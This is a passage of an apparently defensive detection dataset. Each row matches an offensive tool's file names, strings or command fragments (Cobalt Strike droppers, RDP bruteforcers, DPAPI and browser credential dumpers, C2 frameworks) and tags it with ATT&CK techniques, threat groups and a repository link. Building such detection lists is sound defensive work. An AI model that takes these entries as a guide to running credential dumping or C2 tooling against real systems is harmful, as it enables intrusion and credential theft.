T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*drgreenthumb93/CVE-2022-30190-follina*",".{0,1000}drgreenthumb93\/CVE\-2022\-30190\-follina.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" "*DriverQuery.exe no-msft*",".{0,1000}DriverQuery\.exe\sno\-msft.{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*drk1wi/Modlishka*",".{0,1000}drk1wi\/Modlishka.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*droopescan scan drupal -u * -t 32*",".{0,1000}droopescan\sscan\sdrupal\s\-u\s.{0,1000}\s\-t\s32.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Droopscan*",".{0,1000}Droopscan.{0,1000}","offensive_tool_keyword","Droopscan","A plugin-based scanner to identify issues with several CMSs mainly Drupal & Silverstripe.","T1190 - T1199 - T1505 - T1210 - T1213","TA0005 - TA0009","N/A","N/A","Web Attacks","https://github.com/droope/droopescan","1","0","N/A","N/A","10","1192","244","2024-01-19T19:58:03Z","2014-10-22T22:06:30Z" "*drop_malleable_unknown_*",".{0,1000}drop_malleable_unknown_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*drop_malleable_with_invalid_*",".{0,1000}drop_malleable_with_invalid_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*drop_malleable_without_*",".{0,1000}drop_malleable_without_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dropboxC2.py*",".{0,1000}dropboxC2\.py.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dropper_cs.exe*",".{0,1000}dropper_cs\.exe.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*dropper32.exe*",".{0,1000}dropper32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*dropper64.exe*",".{0,1000}dropper64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*drops a netcat?? undetectable by antivirus*",".{0,1000}drops\sa\snetcat\?\?\sundetectable\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*drunkpotato.x64.dll*",".{0,1000}drunkpotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*drunkpotato.x86.dll*",".{0,1000}drunkpotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*drupal_enum.py*",".{0,1000}drupal_enum\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*drupwn --mode exploit --target *",".{0,1000}drupwn\s\-\-mode\sexploit\s\-\-target\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dsbqrprgkqqifztta6h3w7i2htjhnq7d3qkh3c7gvc35e66rrcv66did.onion*",".{0,1000}dsbqrprgkqqifztta6h3w7i2htjhnq7d3qkh3c7gvc35e66rrcv66did\.onion.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*DSInternals_v4.*.zip*",".{0,1000}DSInternals_v4\..{0,1000}\.zip.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - 
T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*dswmiexec.exe*",".{0,1000}dswmiexec\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*dtd-finder*",".{0,1000}dtd\-finder.{0,1000}","offensive_tool_keyword","dtd-finder","Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.","T1221 - T1228 - T1547","TA0005 - ","N/A","N/A","Exploitation tools","https://github.com/GoSecure/dtd-finder","1","0","N/A","N/A","6","582","104","2024-02-21T00:00:00Z","2019-07-15T20:13:54Z" "*dtmsecurity/bof_helper*",".{0,1000}dtmsecurity\/bof_helper.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","210","46","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z" "*dubmoat*",".{0,1000}dubmoat.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Dubmoat_ExtractData*",".{0,1000}Dubmoat_ExtractData.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Dubmoat_PrintFilename*",".{0,1000}Dubmoat_PrintFilename.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Dubmoat_TruncateFile*",".{0,1000}Dubmoat_TruncateFile.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - 
T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*DuBrute v*",".{0,1000}DuBrute\sv.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*dubrute.exe*",".{0,1000}dubrute\.exe.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*DUBrute_v*",".{0,1000}DUBrute_v.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*DuckDuckC2-main*",".{0,1000}DuckDuckC2\-main.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*ducky_keyboard_sender(scancode*",".{0,1000}ducky_keyboard_sender\(scancode.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" 
"*DueDLLigence.cs*",".{0,1000}DueDLLigence\.cs.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*DueDLLigence.sln*",".{0,1000}DueDLLigence\.sln.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*DueDLLigence-master*",".{0,1000}DueDLLigence\-master.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*dump /service:krbtgt *",".{0,1000}dump\s\/service\:krbtgt\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Dump AAD connect account credential in current context*",".{0,1000}Dump\sAAD\sconnect\saccount\scredential\sin\scurrent\scontext.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*Dump AD Certificate Services data*",".{0,1000}Dump\sAD\sCertificate\sServices\sdata.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Dump AD Integrated DNS data*",".{0,1000}Dump\sAD\sIntegrated\sDNS\sdata.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Dump cookies from Chrome or Edge*",".{0,1000}Dump\scookies\sfrom\sChrome\sor\sEdge.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*Dump looted SCCM secrets to specified directory*",".{0,1000}Dump\slooted\sSCCM\ssecrets\sto\sspecified\sdirectory.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*Dump SCCM secrets from WMI requests results*",".{0,1000}Dump\sSCCM\ssecrets\sfrom\sWMI\srequests\sresults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dump_chrome_user*",".{0,1000}dump_chrome_user.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_CREDENTIAL_MSOFFICE*",".{0,1000}dump_CREDENTIAL_MSOFFICE.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_CREDENTIAL_TASKSCHEDULER*",".{0,1000}dump_CREDENTIAL_TASKSCHEDULER.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_CREDENTIAL_TSE*",".{0,1000}dump_CREDENTIAL_TSE.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_domain*",".{0,1000}dump_domain.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*dump_exported_functions(library,dll_orig)*",".{0,1000}dump_exported_functions\(library,dll_orig\).{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" 
"*dump_firefox_user*",".{0,1000}dump_firefox_user.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_google_password()*",".{0,1000}dump_google_password\(\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*dump_jenkins*",".{0,1000}dump_jenkins.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential 